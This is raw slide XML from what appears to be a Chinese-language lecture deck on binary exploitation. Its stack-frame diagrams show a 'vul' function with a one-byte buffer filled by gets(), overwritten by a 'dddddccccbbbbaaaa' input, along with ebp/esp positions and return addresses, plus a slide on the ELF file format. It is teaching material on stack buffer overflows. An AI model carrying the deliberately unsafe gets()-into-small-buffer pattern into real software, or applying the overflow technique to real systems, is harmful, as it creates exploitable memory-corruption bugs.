          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="8669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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="921" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15033130" y="5996530"/>
            <a:ext cx="2027049" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2027048" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="919" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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920" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="31876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22" name="0xb4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="5972605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0xb4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="923" name="char buf[1]"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17160146" y="7919719"/>
            <a:ext cx="3704665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solidFill>
                  <a:srgbClr val="4D4E4D"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>char buf[1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="924" name="0xc0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="7641180"/>
            <a:ext cx="10698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0xc0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="925" name="eax=ebp-9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13138150" y="3764114"/>
            <a:ext cx="3335735" cy="1798487"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49385"/>
              <a:gd name="adj2" fmla="val 68262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eax=ebp-9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="89446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27" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="72682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28" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="6428370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29" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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932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933" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934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5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6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7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8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9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0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1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2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3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944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945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946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47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8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9" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="950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0xd8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0xb4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0x8048417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951" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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952" name="0x804843d"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826587" y="10621089"/>
            <a:ext cx="236692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0x804843d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="953" name="0xe8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18462269" y="9782889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0xe8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="954" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15994422" y="9695259"/>
            <a:ext cx="1078457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55" name="ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="8669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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="956" name="char buf[1]"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17160146" y="7919719"/>
            <a:ext cx="3704665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solidFill>
                  <a:srgbClr val="4D4E4D"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>char buf[1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="957" name="0xb4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="5972605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0xb4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="958" name="0xc0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="7641180"/>
            <a:ext cx="10698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0xc0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="961" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15033130" y="5996530"/>
            <a:ext cx="2027049" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2027048" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="959" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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960" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="31876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62" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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63" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="89446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64" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="72682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65" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="6428370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66" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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0xcf(gets arg[0])"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17306321" y="5577470"/>
            <a:ext cx="340745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0xcf(gets arg[0])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="969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970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971" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="972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3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4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5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6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7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8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9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0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1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982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983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984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85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6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7" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="988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0xd8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0xb0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0x8048418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989" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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990" name="0x804843d"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826587" y="10621089"/>
            <a:ext cx="236692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0x804843d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991" name="0xe8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18462269" y="9782889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0xe8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="994" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="2036079" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2036078" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="992" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="957622" y="323929"/>
              <a:ext cx="1078457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3" name="ebp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="86695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ebp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995" name="char buf[1]"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17160146" y="7919719"/>
            <a:ext cx="3704665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solidFill>
                  <a:srgbClr val="4D4E4D"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>char buf[1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="996" name="0xb4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="5972605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0xb4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997" name="0xc0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="7641180"/>
            <a:ext cx="10698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0xc0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="998" name="dddddccccbbbbaaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568089" y="6075679"/>
            <a:ext cx="13235122" cy="15646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800">
              <a:defRPr sz="10000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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dddddccccbbbbaaaa</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1001" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15033130" y="5158740"/>
            <a:ext cx="2027049" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2027048" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="999" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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1000" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="31876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02" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="89446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003" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="72682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004" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="6428370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005" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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LF"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790874" y="1453761"/>
            <a:ext cx="1818641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ELF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Executable and Linking Format…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12681505" y="927551"/>
            <a:ext cx="9038184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Executable and Linking Format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Linux 可執行檔格式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類似於Windows中的PE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="520px-Elf-layout--en.svg.png" descr="520px-Elf-layout--en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5346" y="5246072"/>
            <a:ext cx="6604001" cy="73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ubtitle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12625419" y="6975044"/>
            <a:ext cx="12960356" cy="3857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marL="228600" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t> BSS Section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>未初始化的全域變數</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t> Data Section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" marL="914400" indent="-228600" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
              <a:defRPr sz="4800"/>
            </a:pPr>
            <a:r>
              <a:t>經初始化的全域變數</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23371741" y="564820"/>
            <a:ext cx="336807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1008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009" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136650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  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010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1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2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3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4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5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6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7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8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9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020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021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022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023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4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5" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026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0xd8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0xb0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0x804841d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027" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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1028" name="0x804843d"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17826587" y="10621089"/>
            <a:ext cx="236692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0x804843d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="0xe8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18462269" y="9782889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0xe8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15994422" y="9695259"/>
            <a:ext cx="1078457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31" name="ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="8669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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="0xb4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="5972605"/>
            <a:ext cx="10955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0xb4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="0xc0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="7641180"/>
            <a:ext cx="10698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0xc0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="dddd"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="81064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dddd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8944689"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1036" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="10624528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037" name="bbbb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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bbbb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038" name="0xcf(gets arg[0])"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17306321" y="5577470"/>
            <a:ext cx="340745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0xcf(gets arg[0])</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1041" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15033130" y="5158740"/>
            <a:ext cx="2027049" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2027048" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1039" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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1040" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="31876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42" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="89446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043" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="72682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044" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="6428370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045" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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" dur="1500" fill="hold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1500" fill="hold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Class="exit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3" dur="1500" fill="hold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9" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1035" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1042" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1028" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1034" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1036" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="1037" grpId="5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1048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049" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136176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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050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1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2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3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4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5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6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7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8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9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060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061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062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063" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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064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65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66" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1067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0xd8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0xc0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0x8048420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068" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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1069" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15994422" y="9695259"/>
            <a:ext cx="1078457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70" name="ebp"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15036800" y="9371330"/>
            <a:ext cx="8669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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="0xc0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934506" y="7641180"/>
            <a:ext cx="10698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0xc0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1072" name="dddd"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="81064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dddd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="cccc"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="8944689"/>
            <a:ext cx="10185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cccc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="bbbb"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="9782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bbbb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="aaaa"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18449433" y="106210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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1078" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15041751" y="7682230"/>
            <a:ext cx="2027050" cy="637541"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2027048" cy="637540"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1076" name="esp"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="968311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1077" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="947548" y="31876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79" name="0xd8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934370" y="9376489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0xd8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1082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083" name="0804840b &lt;vul&gt;:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794000" y="3937000"/>
            <a:ext cx="1136176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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084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5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6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7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8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9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0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1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2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3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094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095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096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097" name="…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18729379" y="55918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098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9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00" name="0xe0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20934519" y="1100963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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1101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0xd8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0xc0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0x8048425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102" name="null"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18602131" y="11459289"/>
            <a:ext cx="8158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1103" name="Line"/>
          <p:cNvSpPr/>
